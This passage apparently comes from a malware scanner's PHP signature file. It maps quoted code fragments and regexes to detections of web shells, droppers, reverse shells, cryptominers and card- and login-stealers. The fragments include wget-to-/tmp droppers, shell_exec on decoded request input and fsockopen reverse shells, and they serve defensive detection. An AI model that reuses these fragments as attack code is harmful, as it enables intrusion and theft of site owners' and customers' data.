				').chr(rand(' => array(STR_CLEARFILE, 'php.backdoor.shell_get.005', NULL),
			),

			'$kernel = php_uname();' => array(STR_CLEARFILE, 'php.backdoor.generic.082', NULL),
			'echo `pkill -U $database`; echo "Complete";' => array(STR_CLEARFILE, 'php.hacktool.generic.016', NULL),
			'])) echo @shell_exec(@base64_decode($_GET[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.shell-exec.006', 'if\(isset\(\$_GET\[.[\w]+.\]\)\) echo @shell_exec\(@base64_decode\(\$_GET\[[^;]+\);'),
			'$nav = get_nav(get_cwd());' => array(STR_CLEARFILE, 'php.backdoor.webshell.152', NULL),
			'$uurl=@file_get_contents($base_url."wp-includes/admin-bar.php");' => array(STR_CLEARFILE, 'php.hacktool.site_scanner.002', NULL),
			'AnarchoXploit' => array(STR_CLEARFILE, 'php.backdoor.webshell.210', NULL),
		),

		'header("HTTP/1.0 404 Not Found")' => array(STR_TRIGGER,

			'require \'wp-config.php\'' => array(STR_TRIGGER,
				'mysqldump' => array(STR_CLEARFILE, 'php.hacktool.dumper.002', NULL),
			),

			'@system($code); $output = ob_get_contents(); ob_end_clean();' => array(STR_CLEARFILE, 'php.backdoor.webshell.149', NULL),
		),

		'header("HTTP/1.0 404 Not Found")' => array(STR_TRIGGER,
			'require \'wp-config.php\'' => array(STR_TRIGGER,
				'mysqldump' => array(STR_CLEARFILE, 'php.hacktool.dumper.002', NULL),
			),
		),

		'echo "Scanning Dork : ".$dork."\n";' => array(STR_TRIGGER,
			'fwrite($fp, base64_decode($shell)' => array(STR_CLEARFILE, 'php.backdoor.uploader_gen.008', NULL),
		),

		'function arr2html($array, &$arr' => array(STR_TRIGGER,
			'arr2html($_REQUEST' => array(STR_CLEARFILE, 'php.backdoor.assert.018', NULL),
		),

		'if(isset($_REQUEST[\'edit\']) && $_REQUEST[\'edit\']==\'file' => array(STR_TRIGGER,
			'if((@preg_match("/system\((.*?)\)/", $op))&&(@preg_match("/<pre>' => array(STR_CLEARFILE, 'php.backdoor.uploader.238', NULL),
		),

		'shell_exec("wget -c' => array(STR_CLEAR_MULTIMATCH, 'php.malware.dropper.025', 'shell_exec\(.wget\s*-c\s*[htps]{4,5}:[^-]+-O\s*\..app[^>]+>&1.\);\s*[^\']+\'\..app[^\.]+\.php.\);\s*unlink\(.\..app[^\.]+\.php.\);'),
		'shell_exec("wget -O /tmp/shell' => array(STR_CLEARFILE, 'php.malware.dropper.024', NULL),
		'w\x67et\x20-\x4f\x20/tmp/\x64\x6fc htt\x70:' => array(STR_CLEARFILE, 'php.malware.dropper.023', NULL),
		'\x77get\x20-O /t\x6d\x70/doc\x20ht\x74p' => array(STR_CLEARFILE, 'php.malware.dropper.021', NULL),
		'shell_exec("chmod 777 -R .' => array(STR_CLEARFILE, 'php.malware.dropper.010', NULL), 
		'if(empty($mailto)){die();}' => array(STR_CLEARFILE, 'php.mailer.COOKIE.002', NULL),
		'ex("curl -o /tmp/sess_' => array(STR_CLEARFILE, 'php.dropper.generic.003', NULL),
		'ion x_shell_exec($c){echo @shell' => array(STR_CLEARFILE, 'php.backdoor.generic-webshell.001', NULL),
		'Response.write CreateObject("wscript.shell").exec("cmd.exe /c whoami").StdOut.ReadAll%>' => array(STR_CLEARFILE, 'asp.backdoor.eval_Request.002', NULL),
		'<option value="shell_exec">shell_exec</option>' => array(STR_CLEARFILE, 'php.hacktool.cpanel_bruteforce.006.03', NULL),
		'result = shell_exec($_POST[\'cmd\'] . " 2>&1"' => array(STR_CLEARFILE, 'php.backdoor.fuckphpshell.001', NULL),
		'$sonuc = shell_exec($komut) ;' => array(STR_CLEARFILE, 'php.backdoor.system.010', NULL),
		'.:Cyber Shell (v 1.0):.' => array(STR_CLEARFILE, 'php.backdoor.system.011', NULL),
		'<a href="?id=pwn_chmod&pwnd=\'.$file_color.' => array(STR_CLEARFILE, 'php.backdoor.webshell.069', NULL),
		'>$cek_shell</a> -> shellmu<br>";' => array(STR_CLEARFILE, 'php.backdoor.curl.010', NULL),
		'new indoxploit_mage_exploit();' => array(STR_CLEARFILE, 'php.backdoor.magento-login.004', NULL),
		'public function exec($url, $code, $data, $password, $login)' => array(STR_CLEARFILE, 'php.hacktool.mailer.058', NULL),
		'while(1){s=document.body.innerHTML+=s+=document.body.innerHTML;}' => array(STR_CLEARFILE, 'js.backdoor.xss_shell.001', NULL),
		'Command Shell</font></b><br>";' => array(STR_CLEARFILE, 'php.backdoor.safe_mode_bypass_shell.001', NULL),
		'cryptonight -o monerohash.com:' => array(STR_CLEARFILE, 'php.malware.cryptominer.003', NULL),
		'\x6f\x63\x3b\x72\x6d\x20-rf /\x74m\x70/\x64\x6fc' => array(STR_CLEARFILE, 'php.malware.dropper.017', NULL),
		'shell_exec(\'wget https://phpshell' => array(STR_CLEARFILE, 'php.backdoor.uploader.320', NULL),
	),

	'$shell' => array(STR_TRIGGER,

		'$backdoor->shell = $shell' => array(STR_CLEARFILE, 'php.backdoor.charlichaplin.001', NULL),
		'$shellPath = pathinfo($_SERVER[\'REQUEST_URI\'], PATHINFO_DIRNAME);' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.068', NULL),
		'$shell_fake_name = "' => array(STR_CLEARFILE, 'php.backdoor.webshell.002', NULL),
		'$shellname.\'\\\';$myurl=' => array(STR_CLEARFILE, 'php.backdoor.filesman.012', NULL),
		'$shellname=\'hucys\';//' => array(STR_CLEARFILE, 'php.backdoor.hucys_shell.001', NULL),
		'my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php";' => array(STR_CLEARFILE, 'pl.backdoor.revsliderexpoit.001.001', NULL),
		'$shellz = $_POST[\'shells\'];' => array(STR_CLEARFILE, 'php.hacktool.shell-uploader.001', NULL),
		'fputs($f,$shell);' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.34', NULL),
		'$headers.=\'From: \' . $random_name . \'@\' . $shell_domain' => array(STR_CLEARFILE, 'php.hacktool.mail_tester.001', NULL),
		'\'<?php \'.base64_decode($shell).\' ?>\'.$backup_copy' => array(STR_CLEARFILE, 'php.backdoor.backdoor_installer.007', NULL),
		'$shell_code' => array(STR_CLEARFILE, 'php.backdoor.webshell.008', NULL),
		'shell = @file_get_contents("$' => array(STR_CLEARFILE, 'php.backdoor.uploader.078', NULL),
		'$defaceurl = $_POST[\'massdefaceurl\'];' => array(STR_CLEARFILE, 'php.hacktool.massdeface.004', NULL),
		'$debuger .= pack ("C",hexdec (substr ($string,$one,2)));' => array(STR_CLEARFILE, 'php.backdoor.WSO.019', NULL),
		'fsockopen($ip, $port' => array(STR_CLEARFILE, 'php.backdoor.reverseshell.004', NULL),
	),

	'system("unzip' => array(STR_TRIGGER,
		'shell_exec("unzip' => array(STR_TRIGGER,
			'proc_open("unzip' => array(STR_TRIGGER,
				'system("unzip' => array(STR_CLEARFILE,'pl.backdoor.generic.001', NULL), 
			),
		),
	),

	'fopen(\'php.ini\',\'w\');' => array(STR_TRIGGER,
		'"safe_mode = OFF' => array(STR_TRIGGER,
			'foreach($configuration' => array(STR_CLEARFILE, 'php.backdoor.webshell.154', NULL),
		),
	),

	'UserPass' => array(STR_TRIGGER,
		'ShellName' => array(STR_TRIGGER,
			'SFlag' => array(STR_CLEARFILE, 'asp.backdoor.aspshell.008',NULL),
		),
	),

	'$aliases = array(\'la\' => \'ls -la\',' => array(STR_TRIGGER,
		'command_hist[current_line] = document.shell.command.value;' => array(STR_CLEARFILE,'php.backdoor.webshell.010', NULL),
	),

	'$doing == \'downfile\'' => array(STR_TRIGGER, 
		'cookielife' => array(STR_CLEARFILE, 'php.backdoor.phpspy-shell.001', NULL),
	),

	'@$data=str_replace("base64_decode' => array(STR_TRIGGER,
		'$html = @file_get_contents($webshell,' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.080', NULL),
	),

	'function editfile($file)' => array(STR_TRIGGER,
		'private $ctrl_dir = array();' => array(STR_CLEARFILE, 'php.backdoor.webshell.137', NULL),
	),

	'PHPShell' => array(STR_TRIGGER,
		'{$_SESSION["c1"]}--exploit-get{$_SESSION["c0"]}' => array(STR_CLEARFILE, 'php.hacktool.inurlbr.001', NULL),
	),

	'Web Shell By SultanHaikal' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.003', NULL),
	'FaTaLisTiCz_Fx' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.004', NULL),
	'Web Shell by boff' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.005', NULL),
	'Web Shell by oRb' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.006', NULL),
	'- Sh3ll - By ' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.007', NULL),
	'Loader\'z WEB Shell' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.008', NULL),
	'PHP Shell by Stoner' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.016', NULL),
	'(Web Shell By Black-ID' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.059', NULL),
	'// Skullv1 Shell' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.064', NULL),
	').\' - FaTaL Shell v' => array(STR_CLEARFILE, 'php.backdoor.fatal-shell.001', NULL),
	'$xName = "B374K Shell";' => array(STR_CLEARFILE,'php.backdoor.b374k-shell.002', NULL),
	'Shell code by ' => array(STR_CLEARFILE, 'php.backdoor.c99-shell.001.003', NULL),
	'PHP Shell 2.0'=> array(STR_CLEARFILE, 'php.backdoor.webshell_gen.072', NULL),
	'[CoolDiyer@<%=Request' => array(STR_CLEARFILE, 'asp.backdoor.cooldiyer.001', NULL),
	'?Action=ScanDrive&Drive=<%=DriveB.DriveLetter%' => array(STR_CLEARFILE, 'asp.backdoor.cooldiyer.001.001', NULL),
	'COMMAND EXECUTER (CODED BY NEO)' => array(STR_CLEARFILE, 'asp.backdoor.command-executer.001', NULL),
	'$_file ->Run(\'cmd.exe /c\'.$post.\' > \'.dirname($_SERVER[SCRIPT_FILENAME]).\'/\'.$file.\'\');' => array(STR_CLEARFILE, 'asp.backdoor.command-executer.001.001', NULL),
	'Umer Rock\'s ASP SHELL' => array(STR_CLEARFILE, 'asp.backdoor.umer.001', NULL),
	'?raiz=root">DRIVES</a> ::.' => array(STR_CLEARFILE, 'asp.backdoor.umer.001.001', NULL),
	'define(\'PHPSHELL_VERSION\', \'' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.076', NULL),
	'$body = "Shell Injector' => array(STR_CLEARFILE, 'php.backdoor.injector.002', NULL),
	'Magic Include Shell' => array(STR_CLEARFILE, 'php.backdoor.MagicIncludeShell.001', NULL), 
	'Spider PHP Shell'=> array(STR_CLEARFILE, 'php.backdoor.spidershell.002', NULL),
	'$proxy_shit="H4sIALMXx0QAA+RafXhU1Zm/' => array(STR_CLEARFILE,'php.backdoor.c100shell.001.002', NULL),
	'WriteData = "4D5A900' => array(STR_CLEAR_MULTIMATCH, 'vb.injected.WSHshell-dropper.001', '<SCRIPT Language=VBScript>[^>]*?DropFileName\s*=\s*"svchost.exe"\s*WriteData\s*=\s*"4D5A90\w+"[^<]+?WSHshell.Run DropPath, 0[^<]*<\/SCRIPT>(<\!--.+?-->)?'),
	'echo "<table><form action = \'".$current. "&mode=port_scan\'' => array(STR_CLEARFILE, 'php.backdoor.darkshell.001', NULL),
	'printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");' => array(STR_CLEARFILE, 'php.dropper.reverse_shell.001', NULL),
	'king By : RxR HaCkEr' => array(STR_CLEARFILE, 'php.defaced.gen.005', NULL),
	'SSI Web Shell edit by ' => array(STR_CLEARFILE, 'php.backdoor.webshell.116', NULL),
	'Coded By Mustafa Moshkela ~ Lions Of Iraq Team' => array(STR_CLEARFILE, 'php.backdoor.webshell.117', NULL),
	'-Ani Shell-' => array(STR_CLEARFILE, 'php.backdoor.webshell.122', NULL),
	'LOLShell' => array(STR_CLEARFILE, 'php.backdoor.lolshell.001.04', NULL),
	'* Description: Simple WordPress Shell -' => array(STR_CLEARFILE, 'php.backdoor.webshell.225', 'NULL'),
	'>Shell info<' => array(STR_CLEARFILE, 'php.backdoor.shell-exec.011', NULL),
	'function findshells($start' => array(STR_CLEARFILE, 'php.backdoor.filesman.086', NULL),
	'[Attack BOT]' => array(STR_CLEARFILE, 'pl.hacktool.ircbot.001', NULL),
	'Priv8-shell-coded-' => array(STR_CLEARFILE, 'php.backdoor.priv8.001', NULL),
	'Purple666' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.39', NULL),
	'my $cmd="[PHP-SHELL]";' => array(STR_CLEARFILE, 'pl.hacktool.ircbot.002', NULL),
	'~ 0x00 PHP shell v' => array(STR_CLEARFILE, 'php.backdoor.0x00-shell.001', NULL),
	'runcommand(\'shellhelp\',\'GET\')' => array(STR_CLEARFILE, 'php.backdoor.ajax-php-command-shell.001', NULL),
	'private shell by x0r' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.010', NULL),
	'shell created by evilc0ders' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.011', NULL),
	'/need shell coder' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.012', NULL),
	'Do not Distibute This shell' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.013', NULL),
	'webr00t cgi shell' => array(STR_CLEARFILE, 'pl.backdoor.webr00t.001', NULL),
	'="/usr/sbin/apache2 -k start";# <-- shell in ps aux' => array(STR_CLEARFILE, 'pl.backdoor.webshell.002', NULL),
	'>.:: kabuss EC Asp shell' => array(STR_CLEARFILE, 'asp.backdoor.aspshell.001', NULL,1),
	'case"hiddenshell":hiddenshell()' => array(STR_CLEARFILE, 'asp.backdoor.aspshell.002', NULL,1),
	'define(\'SHELL_PASSWORD\', $hashed_password);' => array(STR_CLEARFILE, 'php.backdoor.wp-posts.001', NULL),
	'/* RetnOHacK 2013 */ ' => array(STR_CLEARFILE, 'php.hacktool.cpanel_bruteforce.006.001', NULL),
	'<h2 class="banner">PHP AIO SHELL</h2>' => array(STR_CLEARFILE, 'php.backdoor.aio_shell.001', NULL),
	'"DROP TABLE IF EXISTS Ghost_table;\nCREATE TABLE `Ghost_table`' => array(STR_CLEARFILE, 'php.backdoor.ghost_mini_shell.001', NULL),
	'("autoshell"):' => array(STR_CLEARFILE, 'asp.backdoor.eval_Request.004', NULL),
	'sendraw($IRC_cur_socket, "PRIVMSG $printl' => array(STR_CLEARFILE, 'pl.hacktool.ddos-perl-ircbot.001', NULL),
	'$GLOBALS[\'packer\'][\'title\'] = "b374k shell packer";' => array(STR_CLEARFILE, 'php.backdoor.b374kshell.001', NULL),
	'/*  r57shell.php -' => array(STR_CLEARFILE, 'php.backdoor.r57-shell.001.002', NULL),
	'$my_shell_style' => array(STR_CLEARFILE, 'php.backdoor.Dhanush.001', NULL),
	'Revslider/Showbiz shell upload exploit' => array(STR_CLEARFILE, 'pl.backdoor.revsliderexpoit.001', NULL),
	'function doXploitVB($cnf,$html){' => array(STR_CLEARFILE, 'php.backdoor.CyberNetic.001', NULL),
	'<center><h2>Gentoo @ MyHack</h2></center>' => array(STR_CLEARFILE, 'php.backdoor.myhack.001',NULL),
	'$btname = \'backtool.txt\';'=> array(STR_CLEARFILE, 'php.backdoor.myhack.002', NULL),
	'print "[-] example: intitle:phpMyAdmin\n";' => array(STR_CLEARFILE, 'php.hacktool.pma_rce_scanner.001', NULL),
	'9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F;\',CURLOPT_URL => rtrim' => array(STR_CLEARFILE, 'php.hacktool.jce_exploit.002', NULL),
	'die(\'<pre><center>Cant run shell.' => array(STR_CLEARFILE, 'php.backdoor.unknownshell_service.001', NULL),
	'$cmd = "grep -F \'Location:\' $filename | rev | cut -f2' => array(STR_CLEARFILE,'php.backdoor.shell-exec.004', NULL),
	'IyEvdXNyL2Jpbi9weXRob24NCiMgDQppbXBvcnQgc3lzLG9zLHNvY2tl' => array(STR_CLEARFILE, 'php.backdoor.generic-webshell.006', NULL),
	'$win = TRUE;else $win = FALSE;if(isset($_GET[\'y\'])){if(@is_dir' => array(STR_CLEARFILE, 'php.backdoor.webshell.007', NULL),
	'my_print("Evaling main meterpreter stage");' => array(STR_CLEARFILE, 'php.backdoor.meterpreter.001', NULL),
	'$command = trim(str_replace($config_command_prefix' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.081', NULL),
	'move_uploaded_file($nemo' => array(STR_CLEARFILE, 'php.backdoor.uploader.106', NULL),
	'file_put_contents($fuckfile,base64_decode' => array(STR_CLEARFILE, 'php.backdoor.uploader.092', NULL),
	'move_uploaded_file($devtun,$devshell);' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.145', '\$dev[\s]*=[\s]*\$_GET\[.dev.\];[\s]*if\(\$dev[^{]+\{[\s]*\$devshell = \$_FILES[^;]+;[^}]+move_uploaded_file\(\$devtun,\$devshell\);[\s]*\}'),
	'coded By JIKO for all Hackers' => array(STR_CLEARFILE, 'php.backdoor.webshell.128', NULL),
	'"hidden_shell_version" => "#' => array(STR_CLEARFILE, 'php.backdoor.webshell.151', NULL),
),

'_SERVER[' => array(STR_TRIGGER,

	'_SERVER[\'REMOTE_ADDR' => array(STR_TRIGGER,

		'file_get_contents(' => array(STR_TRIGGER,

			'.base64_encode($_POST[' => array(STR_TRIGGER,
				');if(empty($' => array(STR_TRIGGER,
					'curl_exec($' => array(STR_CHAIN_TRIGGER,
						'base64_decode("aHR0cD' => array(STR_CLEAR_MULTIMATCH, 'php.malware.wp_login_stealer.005', '\$[\w]+[\s]*=[\s]*.http[^\(]+base64_decode\([^@]+@file_get_contents\(\$[\w]+\);[\s]*if\(empty\(\$[\w]+\)\)[\s]*\{[\s]*function[\s]*[\w]+\(\$[\w]+\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*curl_init\(\);[^\}]+return[\s]*true;[\s]*\}[\s]*[\w]+\(\$[\w]+\);[\s]*\}'),
						'setcookie(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.wp_login_stealer.005.02', 'setcookie\(.[\w]+.,.[\w]+.,time\(\).[\d]*.[^\)]+\);'),
					),
				),
			),

			']}=@fsockopen(${$' => array(STR_TRIGGER,
				']}));}return(function_exists(${$' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.327', 'if[\s]*\(!defined[\s]*\(.CONFIG_CHECK_JOB.\)\)[\s]*\{[\s]*define\(.CONFIG_CHECK_JOB.,[\s]*[\d]+\);[\s]*\$\{..x[\d]+[^@]+\]\}=@fsockopen\(\$\{\$[\w]+\}\[[^@]+explode\(.,.,@ini_get\([^@]+\];\}break;\}\}\}'),
			),

			'?email=$username&pass=$password' => array(STR_TRIGGER,
				'$username."|".$password' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-login-stealer.006', '\$\w+\s*=\s*\$_SERVER\[.HTTP_HOST.];\s*\$\w+\s*=\s*\$_SERVER\[.REMOTE_ADDR.\];\s*\$\w+\s*=\s*\$_SERVER\[.HTTP_USER_AGENT.\];\s*\$\w+\s*=\s*.http\:[^;]+;\s*\$\w+\s*=\s*curl_init\(\);[^>]+>countryCode[^>]+>country;\s*\$\w+\s*=\s*.http\:[^;]+;\s*\$\w+\s*=\s*file_get_contents\([^\)]+\);\s*if\([^\)]+\)\s*\{[^\}]+\}\s*else\s*\{[^\}]+\}\s*\$\w+\s*=\s*file_get_contents\([^\)]+\);\s*[^;]+;[^;]+;\s*\}\s*\$\w+\s*=\s*.ba[^s]+se[^d]+de[^;]+;\s*\$\w+\s*[^;]+;\s*\$\w+\s*=[^;]+\;\s*\$\w+\s*=[^\$]+\$username[^\$]+\$password[^;]+;\s*\$\w+[^;]+;\s*\$\w+\s=\s.From\:[^;]+;\s*\$\w+\([^\)]+\);'),
			),

			'\x72\x65\x70\x6C\x61\x63\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];window' => array(STR_CLEARFILE, 'php.malware.dropper.008', NULL), 
			'echo $con3.$con2;' => array(STR_CLEARFILE, 'php.malware.adinjection.002', NULL),
			'$data = "HOT $device->$user,$pass,$ip<$hostname' => array(STR_CLEARFILE, 'php.phishing.generic.057', NULL),
			'."&ccname=&ip=".$' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.089', '(\$\w+)\s*=\s*new\s*\w+\s*\(\)\s*;\s*(\$\w+)\s*=\s*\$this\s*->\s*getRequest\(\)\s*->\s*getPost\(.payment.\s*,\s*array\(\)\s*\)\s*;\s*(\$\w+)\s*=\s*\$this\s*->\s*getRequest\(\)\s*->\s*getPost\(.billing.\s*,\s*array\(\)\s*\)\s*;[^{]+{\s*[^:]+Mage::getModel[^:]+file_get_contents\(\'php:\/\/input\'\)\s*;[^:]+(\$\w+)\s*=\s*.https?:\/\/[^;]+;\s*\$ch\s*=\s*curl_init\(\4\)\s*;[^@]+curl_close\(\$ch\)\s*;'),
			'curl_exec($ch);curl_close($ch);return true;}get_pass_Html(' => array(STR_CLEAR_LINEMATCH, 'php.malware.wp_login_stealer.003', '\$[\w]+[\s]*=[\s]*.http[^;]+;\$[\w]+[\s]*=[\s]*\$_SERVER\[.REMOTE_ADDR.\];\$[\w]+[\s]*=[\s]*base64_decode\([^\)]+\)\.base64_encode\(\$[\w]+\)[^\{]+[\s]*\{function[\s]*[\w]+\(\$[\w]+\)\{\$[\w]+[\s]*=[\s]*curl_init\(\);[\s]*curl_setopt[\s]*\(\$[\w]+,[\s]*CURLOPT_URL,[\s]*\$[\w]+\);[\s]*curl_setopt[^\}]+return[\s]*true;[\s]*\}[\s]*[\w]+\(\$[\w]+\);[\s]*\}[\s]*setcookie\([^;]+time\(\)\+[\d]+.[\d]+.[\d]+\);'),
			'if(_spider() && _main()) {' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.316', 'function[\s]*_spider\(\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*strtolower\(\$_SERVER\[.HTTP_USER_AGENT.\]\);[\s]*\$[\w]+[^@]+@\$_SERVER\[.REMOTE_ADDR.\]\)\);[\s]*\$[\w]+[\s]*=[\s]*array\(.sogouspider[^@]+strtolower\(@\$_SERVER\[.HTTP_REFERER.\]\);[\s]*if\(empty\(\$referer\)\)[\s]*\{[\s]*return[\s]*false;[\s]*\}[^@]+strtolower\(@\$_SERVER\[.HTTP_REFERER.\]\);[\s]*if\(empty\(\$referer\)\)[\s]*\{[\s]*return[\s]*false;[\s]*\}[^@]+@ob_end_clean\(\);[\s]*echo[\s]*@file_get_contents\([^@]+@ob_end_flush\(\);[\s]*exit\(\);[\s]*\}[\s]*if\(_keywords\(\)\)[\s]*\{[\s]*if[^\}]+@ob_end_flush\(\);[\s]*exit\(\);[\s]*\}[\s]*\}([\s]*header\(.[^;]+;[\s]*charset=[\w]+.\);)?'),
			'if (preg_match("/google/i", $hostIp) || preg_match("/google/i", $hostRealIp)){' => array(STR_CLEARFILE, 'php.malware.injector.076', NULL),
		),

		'user_ip\'=>$_SERVER[\'REMOTE_ADDR\'],\'user_ua' => array(STR_TRIGGER,

			'CURLOPT_URL, base64_decode' => array(STR_TRIGGER,

				'http_build_query(array(' => array(STR_TRIGGER,
					'array_merge($_POST' => array(STR_TRIGGER,
						'isset($order_info)' => array(STR_TRIGGER,
							'base64_decode\(.aH' => array(REX_CLEAR_MULTIMATCH, 'php.malware.cc_stealer.026', 'if\([\s]*isset\(\$_POST\)[\s]*&&[\s]*isset\([\s]*\$[\w]+\)[\s]*\)[\s]*\{[\s]*(error_log\([\d]+\);)?[\s]*\$[\w]+[\s]*=[\s]*array_merge\(\$_POST,[\s]*\$[\w]+\);[\s]*\$[\w]+[\s]*=[\s]*curl_init\(\);[\s]*curl_setopt\(\$[\w]+,[\s]*CURLOPT_URL,[\s]*base64_decode\(.[^\)]+\)\.http_build_query\(array\(.[\w]+.=>base64_encode\(json_encode\(\$[\w]+\)\),[^;]+;[\s]*curl_setopt\(\$[\w]+,CURLOPT_RETURNTRANSFER,true\);\$[\w]+[\s]*=[\s]*curl_exec\(\$[\w]+\);[\s]*curl_close\(\$[\w]+\);[\s]*\}'),
						),
					),
				),

				'\$[\w]+\)[\s]*\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*curl_init\(\);' => array(REX_TRIGGER,
					'if[\s]*\([\s]*isset[\s]*\([\s]*\$[\w]+\)[\s]*\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*curl_init\(\);[\s]*curl_setopt' => array(REX_CLEAR_MULTIMATCH, 'php.malware.cc_stealer.001.02', 'if[\s]*\([\s]*isset[\s]*\([\s]*\$[\w]+\)[\s]*\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*curl_init\(\);[\s]*curl_setopt\(\$[\w]+,[\s]*CURLOPT_URL,[\s]*base64_decode\(.aHR[^\}]+curl_close\(\$[\w]+\);[\s]*\}'),
				),
	
				'http_build_query(array(\'s\'=>base64_encode(json_encode(array_merge' => array(STR_CLEAR_MULTIMATCH, 'php.malware.cc_stealer.001', '\$[\w]+[\s]*=[\s]*curl_init\(\);[\s]*curl_setopt\(\$[\w]+,[\s]*CURLOPT_URL,[\s]*base64_decode\(.aHR[^\}]+curl_close\(\$[\w]+\);'),
				'base64_encode(json_encode($_POST)),\'user_ip\'=>$_SERVER[\'REMOTE_ADDR\']' => array(STR_CLEAR_MULTIMATCH, 'php.malware.cc_stealer.024', 'if.\(isset\(\$_POST\)\)\{\s+error_log.0.;\s+\$\w+.=.curl_init\(\);curl_setopt\(\$\w+,CURLOPT_URL,\s+base64_decode\(\'[^;]*;\s+curl_setopt[^\}]*\}'), 
			),

			'file_get_contents[\s\(]+base64_decode\(.aH' => array(REX_CLEAR_MULTIMATCH, 'php.malware.cc_stealer.001.03', 'if[\s]*\([\s]*isset\([\s]*\$_POST\)[\s]*\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*file_get_contents[\s\(]+base64_decode\(.aHR[^\}]+\);[\s]*\}'),
		),

		'header("location:' => array(STR_TRIGGER,

			'HTTP/1.0 404 Not Found' => array(STR_TRIGGER,
				'$bannedIP = array("^' => array(STR_TRIGGER,
					'if (substr_count($hostname, $word) > 0) {' => array(STR_CLEARFILE, 'php.phishing.redirect.020', NULL),
				),
			),

			'$_POST[\'bankname' => array(STR_TRIGGER,
				'$mail->AddAddress(' => array(STR_CLEARFILE, 'php.phishing.mailer.130', NULL),
			),

			'fwrite($id, $conteudo, strlen($conteudo' => array(STR_CLEARFILE, 'php.phishing.redirect.004', NULL),
			'function recurse_copy($JOkEr7' => array(STR_CLEARFILE, 'php.phishing.redirect.015', NULL),
		),

		'isset($_SERVER[\'HTTP_X_FORWARDED_FOR' => array(STR_TRIGGER,
			
			'function all_keys' => array(STR_TRIGGER,
				'$urlfilename = "url".$clientid;' => array(STR_CLEARFILE, 'php.spam-seo.injector.256.02', NULL),
			),

			'foreach($result->redirect->headers as $header' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.256.03', '\$apiKey =[^;]+;[\s]*\$campaignId =[^;]+;[\s]*\$keyword[\s]*=[\s]*urlencode[^>]+\$result->redirect[^<]+echo \$result->redirect->content;[\s]*(exit;)?[\s]*\}[\s]*\}'),
		),

		'header(\'Location:' => array(STR_TRIGGER,

			'header(\'Location: http' => array(STR_TRIGGER,

				'.*","^' => array(STR_TRIGGER,
					'<h1>404 Not Found</h1>The page' => array(STR_TRIGGER,
						'){if(preg_match(\'/\'.$' => array(STR_CLEARFILE, 'php.phishing.block_bots.007', NULL),
					),
				),

				'fwrite($' => array(STR_TRIGGER,
					'fopen(' => array(STR_TRIGGER,
						'header\(.Location:[\s]+http[^;]+\);[\s]*\$[\w]+[\s]*=[\s]*fopen\([^;]+\);[\s]*fwrite\(\$[\w]+,[\s]*\$_SERVER\[.REMOTE_ADDR.\][^;]+\);[\s]*fclose\(\$[\w]+\);' => array(REX_CLEARFILE, 'php.malware.redirect.030', NULL),
					),
				),
				
				'exit(header(\'Location: http' => array(STR_TRIGGER,
					'\)[\s]*{[\s]*if[\s]*\(preg_match\(\'\/\'[\s]*.[\s]*\$' => array(REX_CLEARFILE, 'php.phishing.block_bots.006', NULL),
				),

				')){ echo file_get_contents(\'http' => array(STR_TRIGGER,
					'http_build_query($_GET)' => array(STR_CLEARFILE, 'php.malware.redirect.029', NULL),
				),
			),

			'fwrite($novoarquivo,$d ." - ".$ip." - ".$browser."' => array(STR_CLEARFILE, 'php.phishing.redirect.005', NULL),
			'get_client_ip().\';\'.$_SERVER[\'HTTP_USER_AGENT\']."\n", FILE_APPEND' => array(STR_CLEARFILE, 'php.spam-seo.injector.227', NULL),
		),

		'<body onload="document.form.submit()' => array(STR_TRIGGER,
			'<title>Redirecting..' => array(STR_TRIGGER,
				'@$_SERVER[\'HTTP_CLIENT_IP\'];' => array(STR_TRIGGER,
					'elseif(filter_var($forward, FILTER_VALIDATE_IP))' => array(STR_CLEARFILE, 'php.malware.redirect.041', NULL),
				),
			),
		),

		'$file = \'ips.txt\';' => array(STR_TRIGGER,
			'fwrite($fp, $ipaddress);' => array(STR_TRIGGER,
				'(!empty($_SERVER[\'HTTP_CLIENT_IP\']))' => array(STR_CLEARFILE, 'php.malware.component.015', NULL),
			),
		),

		'if(!(strpos($sUserAgent, \'google\') === false))' => array(STR_TRIGGER,
